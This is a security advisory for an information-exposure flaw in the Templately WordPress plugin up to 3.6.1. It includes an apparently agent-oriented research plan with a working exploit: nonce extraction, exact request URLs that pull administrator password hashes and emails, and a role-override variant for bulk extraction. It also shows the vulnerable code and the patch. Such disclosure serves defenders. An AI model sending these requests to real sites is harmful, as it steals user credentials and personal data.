Templately – Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! <= 3.6.1 - Authenticated (Contributor+) Information Exposure
Description
The Templately – Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive user or configuration data.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:NTechnical Details
What Changed in the Fix
Changes introduced in v3.6.2
Source Code
WordPress.org SVN# Vulnerability Research Plan: CVE-2026-42379 (Information Exposure) ## 1. Vulnerability Summary The **Templately** plugin (up to version 3.6.1) contains an authenticated information exposure vulnerability within its REST API implementation. Specifically, the `autocomplete` method in the `Templatel…
Show full research plan
Vulnerability Research Plan: CVE-2026-42379 (Information Exposure)
1. Vulnerability Summary
The Templately plugin (up to version 3.6.1) contains an authenticated information exposure vulnerability within its REST API implementation. Specifically, the autocomplete method in the Templately\API\Conditions class allows authenticated users with "Contributor" level access or higher to extract sensitive user data (including email addresses and password hashes) by exploiting improper input validation and dynamic object property access.
The vulnerability exists because the autocomplete-condition endpoint accepts a query parameter where the field key is used directly to access properties of WP_User objects returned by get_users().
2. Attack Vector Analysis
- Endpoint:
/wp-json/templately/v1/autocomplete-condition - Method:
GET - Authentication: Authenticated (Contributor+)
- Capability Check:
current_user_can( $post_type_object->cap->edit_posts )whereSource::CPTistemplately_library. Standard Contributors possess theedit_postscapability. - Vulnerable Parameters:
query[query_type]: Set toauthorsto trigger user searching.query[field]: The sensitiveWP_Userproperty to extract (e.g.,user_email,user_pass,user_login).payload: The search string to match users.
3. Code Flow
- Request Entry: A
GETrequest is made towp-json/templately/v1/autocomplete-condition. - Permission Check:
Templately\API\Conditions::permission_checkis called. It verifies if the user has theedit_postscapability for the Templately CPT (templately_library). - Route Handling:
Templately\API\Conditions::autocompleteis executed. - Input Processing:
- The code retrieves
$query = $request->get_param( 'query' ). - It identifies the search type via
$type = $query['query_type']. - It identifies the target return field via
$by_field = $query['field'].
- The code retrieves
- Data Fetching: When
$typeisauthors, it callsget_users( $args ), returning an array ofWP_Userobjects. - Information Sink: The code iterates through the users:
Ifforeach ( $data as $item ) { $results[] = [ 'label' => $item->{$data_key}, // display_name 'value' => $item->{$by_field} // VULNERABLE: Dynamic property access ]; }by_fieldisuser_pass,$item->user_passreturns the Bcrypt hash.
4. Nonce Acquisition Strategy
The REST API requires a standard WordPress wp_rest nonce for authenticated requests.
- Login: Authenticate as a Contributor.
- Navigate: Go to the WordPress Dashboard (
/wp-admin/). - Extraction: Use
browser_evalto extract the nonce from thewpApiSettingsglobal object provided by WordPress core.- Command:
browser_eval("wpApiSettings.nonce")
- Command:
- Usage: Include this nonce in the
X-WP-Nonceheader of the exploit request.
5. Exploitation Strategy
- Target Identification: We will target the Admin user (ID 1) to extract their email and password hash.
- Payload Construction:
action:templately/v1/autocomplete-conditionpayload:admin(to search for the admin account)query[query_type]:authorsquery[field]:user_pass(to get the hash)
- Execution:
- Use
http_requestas the Contributor. - Method:
GET - Headers:
X-WP-Nonce: [EXTRACTED_NONCE] - URL:
/wp-json/templately/v1/autocomplete-condition?payload=admin&query[query_type]=authors&query[field]=user_pass
- Use
6. Test Data Setup
- Create Victim Admin: Ensure an admin user exists with a known username (e.g.,
admin). - Create Attacker Contributor:
- Username:
attacker - Password:
password123 - Role:
contributor
- Username:
- Plugin State: Ensure the Templately plugin (<= 3.6.1) is installed and activated.
7. Expected Results
A successful exploit will return a JSON response containing an array of objects. Each object will contain the display_name of matched users and the sensitive data requested in the value field.
Example Response:
{
"success": true,
"data": [
{
"label": "Site Administrator",
"value": "$P$ByY7..."
}
]
}
8. Verification Steps
- Check Response: Confirm the
valuefield contains a string starting with$P$or$2y$(standard WordPress/PHP password hashes). - WP-CLI Validation: Compare the extracted hash with the actual hash in the database.
- Command:
wp user get 1 --field=user_pass
- Command:
- Email Extraction: Repeat the exploit with
query[field]=user_emailand verify it matcheswp user get 1 --field=user_email.
9. Alternative Approaches
- Bulk Extraction: If the search
$payloadis set to an empty string or a single common character (likea), the plugin might return multiple users depending onget_usersdefaults. - Argument Injection: Since
$query['query']is passed towp_parse_argsand used inget_users($args), an attacker can override query parameters likeroleorincludeto target specific users:- URL:
/wp-json/templately/v1/autocomplete-condition?payload=&query[query_type]=authors&query[field]=user_pass&query[query][role]=administrator
- URL:
Summary
The Templately plugin for WordPress is vulnerable to Sensitive Information Exposure via the 'autocomplete-condition' REST API endpoint due to improper validation of the 'field' parameter. Authenticated attackers with Contributor-level access or higher can exploit this to extract sensitive user data, including password hashes and email addresses, by performing dynamic property access on WP_User objects.
Vulnerable Code
// includes/API/Conditions.php lines 122-132 $by_field = $query['field'] ?? ''; if ( empty( $by_field ) ) { // FIXME: need throw error maybe return $this->success( [] ); } --- // includes/API/Conditions.php lines 166-172 if ( ! empty( $data ) && is_array( $data ) ) { foreach ( $data as $item ) { $results[] = [ 'label' => $item->{$data_key}, 'value' => $item->{$by_field} ]; } }
Security Fix
@@ -128,6 +128,11 @@ return $this->success( [] ); } + $allowed_fields = [ 'ID', 'post_title', 'name', 'user_login', 'term_id', 'slug' ]; + if ( ! in_array( $by_field, $allowed_fields ) ) { + return $this->success( [] ); + } + $payload = sanitize_text_field( $request->get_param( 'payload' ) ); $args = [ 'search' => $payload ];
Exploit Outline
1. Authenticate to the WordPress site as a user with at least Contributor-level privileges. 2. Extract the current WordPress REST API nonce from the 'wpApiSettings' object in the dashboard source code. 3. Construct a GET request to the '/wp-json/templately/v1/autocomplete-condition' endpoint. 4. In the request parameters, set 'query[query_type]' to 'authors' to trigger a user search. 5. Set the 'query[field]' parameter to 'user_pass' to target password hashes, or 'user_email' for email addresses. 6. Provide a search string (e.g., 'admin') in the 'payload' parameter to identify the target user account. 7. The plugin will execute 'get_users' and return an array where the 'value' key contains the sensitive data corresponding to the requested 'field'.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.